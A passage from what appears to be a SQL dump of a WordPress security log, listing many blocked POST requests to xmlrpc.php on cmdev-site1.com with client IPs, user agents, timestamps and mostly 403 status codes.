AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','D9FePJfZWcihatdLMbmoBNG2',0,1681038816.3620,1618,'','POST',403,0,515,0,1,'',0),('5.22.249.133',85391749,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','S819GYJXiTbpaZhHmCKlgc7d',0,1681031251.4542,2030,'','POST',403,0,515,0,1,'',0),('144.24.100.136',2417517704,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','p3MSomX06F5UznrZgjCvIcY7',0,1681031248.2879,4470,'','POST',403,0,515,0,1,'',0),('91.134.248.211',1535572179,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','b9FmXASPYq7fl01tVGdTcpZh',0,1681031250.6071,2050,'','POST',403,0,515,0,1,'',0),('103.152.79.248',1738035192,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','A801aqdS5lysKNFE6hcwetpV',0,1681029647.0384,644,'','POST',403,0,515,0,1,'',0),('213.152.161.30',3583549726,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','nCidMb4KeYV5ZIGEqmfR6lOp',0,1681030128.9194,3503,'','POST',403,0,515,0,1,'',0),('8.140.29.143',143400335,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','QBGgv9Lnl1NUMbxy0YPAthOf',0,1681029642.2173,628,'','POST',403,0,515,0,1,'',0),('148.66.147.20',2487390996,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','gJxeMmuQ1ZrA04SFD9lsz37a',0,1681029641.0246,658,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','9hvlkQs6bcjNxOC7uMWD5A4U',0,1681029635.8614,1532,'','POST',403,0,515,0,1,'',0),('184.168.96.211',3098042579,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','URT9wOuy1YgWBAdCxoPhkQF5',0,1681029632.7126,593,'','POST',403,0,515,0,1,'',0),('212.90.148.14',3562705934,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','j49SVUgMsCR7dFLDviOGT8Jt',0,1681029630.9170,563,'','POST',403,0,515,0,1,'',0),('92.42.111.218',1546285018,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','jmvqYVEZW0xfu6JXhcI3sMO7',0,1681029625.4117,552,'','POST',403,0,515,0,1,'',0),('13.75.144.52',223055924,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','PwmilF01WJgXVzDQE7aGjIKN',0,1681029621.9958,594,'','POST',403,0,515,0,1,'',0),('8.140.29.143',143400335,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','cwMxbPoTW3vusOQnKVJUGZDz',0,1681029617.1396,872,'','POST',403,0,515,0,1,'',0),('134.19.179.179',2249438131,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','klynE2pGQI1HwLhARUvTJ5NO',0,1681028389.8961,1420,'','POST',403,0,515,0,1,'',0),('184.75.223.195',3091980227,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','EGNU7ild5AmIDqZgQkR3VbHS',0,1681028185.7030,656,'','POST',403,0,515,0,1,'',0),('46.183.216.163',783800483,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','tHDufg3pWLdFZByCvwk1mX5K',0,1681027981.7263,731,'','POST',403,0,515,0,1,'',0),('144.76.57.230',2420914662,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2EQTHOYNRvl54homcryM8Aap',0,1681026246.7301,688,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','uNDt9bKEVZ20lMJo64ymkXiO',0,1681026244.4879,596,'','POST',403,0,515,0,1,'',0),('161.97.96.198',2707513542,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','zOA0dlyqwP7SKkZbsgVUEi41',0,1681026234.2258,553,'','POST',403,0,515,0,1,'',0),('184.168.98.254',3098043134,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','R6OCjgDJQ0eAZU3ly4BbM5Pz',0,1681026223.4356,664,'','POST',403,0,515,0,1,'',0),('139.162.104.127',2342676607,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','31HsyeFVD8a6CQokAlnqM4Eu',0,1681026221.4649,596,'','POST',403,0,515,0,1,'',0),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','VIuUqGXE25oMymOzt8FWShg3',0,1681026216.5783,2518,'','POST',403,0,515,0,1,'',0),('194.59.206.66',3258699330,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','dUREfVuOBWJMnHbFAjkD76T3',0,1681026216.2684,2824,'','POST',403,0,515,0,1,'',0),('45.162.228.171',765650091,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ceB8a71t2Np4rivz6MKGwWER',0,1681025547.3116,3814,'','POST',403,0,515,0,1,'',0),('213.152.162.104',3583550056,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ByZbIiE1a3eKPpXftcNAqCUM',0,1681025270.9341,3630,'','POST',403,0,515,0,1,'',0),('185.183.106.3',3115805187,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','q1JuLOzagfoBvNMsP6KRlXIY',0,1681024625.9620,4265,'','POST',403,0,515,0,1,'',0),('62.102.148.187',1046910139,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','woBy152M4UJftXsDRGN3hYv7',0,1681023946.3757,5646,'','POST',403,0,515,0,1,'',0),('84.39.116.180',1411871924,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','EqeQ6VfDZdU2FcLH4Rk1jAOK',0,1681023005.2704,5288,'','POST',403,0,515,0,1,'',0),('82.102.27.171',1382423467,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','bv6wWnglIHs3CAduJLihxfzo',0,1681022520.1918,2163,'','POST',404,0,515,0,1,'',0),('82.102.27.171',1382423467,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','CKdfHXyr78lm0bUoBGVTQAvs',0,1681022403.3376,2748,'','POST',403,0,515,0,1,'',0),('82.102.27.171',1382423467,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','JFzexLrBgf1OmPEYcNkHh0Aj',0,1681022382.2037,8294,'','POST',403,0,515,0,1,'',0),('213.152.162.181',3583550133,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','lMbhRz7nBFudxJSA4c31X9Pj',0,1681021516.1410,3630,'','POST',403,0,515,0,1,'',0),('213.152.162.74',3583550026,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','TpIVJhi9AUf8ZCYLPao3wQNc',0,1681019651.5059,3866,'','POST',403,0,515,0,1,'',0),('195.206.105.203',3285084619,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','l2XYEWcV0pFUNT5afDxAeQhH',0,1681019109.7420,1354,'','POST',403,0,515,0,1,'',0),('195.206.105.203',3285084619,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','9kx8u5JeB6K174vLSrqVTNFf',0,1681019108.8273,1739,'','POST',403,0,515,0,1,'',0),('213.152.161.118',3583549814,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','PSfZyplk2hUDnr0CqMEac6YX',0,1681019009.3260,5862,'','POST',403,0,515,0,1,'',0),('159.65.72.143',2671855759,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','JwjcKBmT3dOafFUIznMHut2y',0,1681017629.5511,599,'','POST',403,0,515,0,1,'',0),('142.93.223.16',2388516624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','8OnaVHZ4TSJzNo3dsFqAKCQg',0,1681017610.4134,643,'','POST',403,0,515,0,1,'',0),('34.95.136.51',576686131,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','nd0Tx9EHASzGywc76if3RCVg',0,1681017602.1896,1216,'','POST',403,0,515,0,1,'',0),('103.139.1.249',1737163257,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','7IwzeYj2yJW5U3LsHn0fDQVa',0,1681017591.9676,1582,'','POST',403,0,515,0,1,'',0),('159.223.71.186',2682210234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','wRzvuEaUy0XYmqPbMorIcpOs',0,1681017590.3649,2475,'','POST',403,0,515,0,1,'',0),('159.223.93.124',2682215804,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','WAX54yYtxB9dgmCDIJriu12f',0,1681017590.2663,1585,'','POST',403,0,515,0,1,'',0),('159.223.71.186',2682210234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','CDlT6Aj7KHW23LYhOtc9vewn',0,1681017583.5529,1097,'','POST',403,0,515,0,1,'',0),('198.71.235.60',3326602044,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','hk3Uw6F50YI47sXLuHjcy8MO',0,1681017582.7387,1448,'','POST',403,0,515,0,1,'',0),('91.214.169.69',1540794693,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','zGUf0xsuOdN8IXJEeK6RhyMa',0,1681017229.2475,579,'','POST',403,0,515,0,1,'',0),('91.214.169.69',1540794693,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','U3oQApwB7kSdK5zfq9IPbYme',0,1681017224.1295,766,'','POST',403,0,515,0,1,'',0),('13.36.120.166',220493990,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','En5KwzIUhRVy9aHrvOdcNX8s',0,1681037277.8410,1170,'','POST',403,0,515,0,1,'',0),('138.68.45.151',2319723927,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','rYSl2ef5OdVpvHEDX1qJtciT',0,1681037277.5233,1257,'','POST',403,0,515,0,1,'',0),('162.255.118.204',2734651084,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','DeUtxzFQZ4XWC2yRHb6Tqohg',0,1681037264.9241,552,'','POST',403,0,515,0,1,'',0),('188.68.47.117',3158585205,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','gsrT7yqetnAZ4JvHlUDC0IMN',0,1681037259.3622,546,'','POST',403,0,515,0,1,'',0),('92.205.17.155',1556943259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','xAaRruT91BULYsXQeIq7SkcH',0,1681037254.7354,548,'','POST',403,0,515,0,1,'',0),('47.242.33.63',804397375,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','hv2BOoVQqCKdlLku57jRbZa8',0,1681037246.0513,559,'','POST',403,0,515,0,1,'',0),('34.231.174.129',585608833,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','tnOZLslAJg4GVq31XmpbzCiF',0,1681037237.4458,551,'','POST',403,0,515,0,1,'',0),('54.38.197.19',908510483,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','tldipf1eUrxIARFQW4BPHvn8',0,1681037235.4601,871,'','POST',403,0,515,0,1,'',0),('114.215.93.65',1926716737,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','1HIbDL26ko9uKE047glN5BSU',0,1681037234.4960,982,'','POST',403,0,515,0,1,'',0),('213.152.187.195',3583556547,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','iykjUR0DsM1LmF647bfGg9c2',0,1681037129.8741,719,'','POST',403,0,515,0,1,'',0),('213.152.161.219',3583549915,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','3NoXGFHktT8Jb6LfC1pVj42i',0,1681035735.0121,1454,'','POST',403,0,515,0,1,'',0),('148.72.232.52',2487806004,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','Ljp1qFszCv7itdUGJTm0EK3R',0,1681035374.6064,568,'','POST',403,0,515,0,1,'',0),('148.66.147.20',2487390996,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','yq9Kae3AFu2vjYnolwVQdkhU',0,1681035367.1524,554,'','POST',403,0,515,0,1,'',0),('79.170.40.175',1336551599,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','JirG3caNup8ZDYWHExQqKPIX',0,1681035361.6503,632,'','POST',403,0,515,0,1,'',0),('198.71.235.60',3326602044,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','dJunarlHCk8GN7YXvDy1ecxQ',0,1681035357.9754,565,'','POST',403,0,515,0,1,'',0),('37.46.133.245',623805941,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','FXR3pYnU84q7o0GkDAeg9buO',0,1681035331.3930,1647,'','POST',403,0,515,0,1,'',0),('103.9.227.178',1728701362,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','30jtOqFbcxyPsZ4zLUGv5Hp8',0,1681035335.4798,615,'','POST',403,0,515,0,1,'',0),('162.219.176.3',2732306435,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','MEG0lYnw53dAmxUFJvVKzILN',0,1681035198.7823,1949,'','POST',403,0,515,0,1,'',0),('193.37.254.3',3240492547,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','MnZhs19FlioD4tqbgeK3HQRW',0,1681034481.0161,1614,'','POST',403,0,515,0,1,'',0),('193.148.16.211',3247706323,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Q40TDAthF6Xi7jzBHcwudmK1',0,1681031633.3167,643,'','POST',403,0,515,0,1,'',0),('146.70.61.131',2454076803,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','7aL1xgTYw9RO5tSXqdUych2E',0,1681032027.1334,4017,'','POST',403,0,515,0,1,'',0),('64.42.179.51',1076540211,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','1XApyWuZVIjFz3BthrKgwUlY',0,1681031536.7523,3839,'','POST',403,0,515,0,1,'',0),('147.135.161.89',2475139417,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','lIiPg7E1bSrmzkXpKxB5V9TW',0,1681031289.6191,698,'','POST',403,0,515,0,1,'',0),('91.219.122.50',1541110322,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','HjhMYfN16lynbGPTIrOvwmgQ',0,1681031287.4057,666,'','POST',403,0,515,0,1,'',0),('161.97.96.198',2707513542,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','1kDxVtwK4RO3ThNfgHb8PrdM',0,1681031278.5169,719,'','POST',403,0,515,0,1,'',0),('185.98.5.146',3110208914,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','OBprwo3vUijkXdYPSzfhWA7H',0,1681031276.6388,566,'','POST',403,0,515,0,1,'',0),('104.215.82.71',1758941767,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','4q2huWU79TPDcGJx6k8oHQn5',0,1681031272.2813,587,'','POST',403,0,515,0,1,'',0),('74.208.160.149',1255186581,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','bOSVPL0rWdlZaET7v8kgYJ2x',0,1681031262.6748,1015,'','POST',403,0,515,0,1,'',0),('129.226.138.214',2179107542,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','M5GkzSwbs6r9Jdi4NmR3YEBp',0,1681031263.4765,920,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','2wHEP471mFpdfCoWb39Yc0LJ',0,1681031257.5450,622,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','3x4Jt5HVjkINqiyzECr0fAFl',0,1681049210.0710,726,'','POST',403,0,515,0,1,'',0),('194.187.251.91',3267099483,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','dHXqR4lbN58in0SpPg2zIAou',0,1681049148.1533,5999,'','POST',403,0,515,0,1,'',0),('184.168.100.170',3098043562,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','hfHzSiWVlFj8qJPQZ7YOyK5I',0,1681049203.7008,666,'','POST',403,0,515,0,1,'',0),('213.152.187.210',3583556562,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','PQ3GviutA19YxBrbMCESOo8z',0,1681074650.3977,4020,'','POST',403,0,515,0,1,'',0),('210.65.139.75',3527510859,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 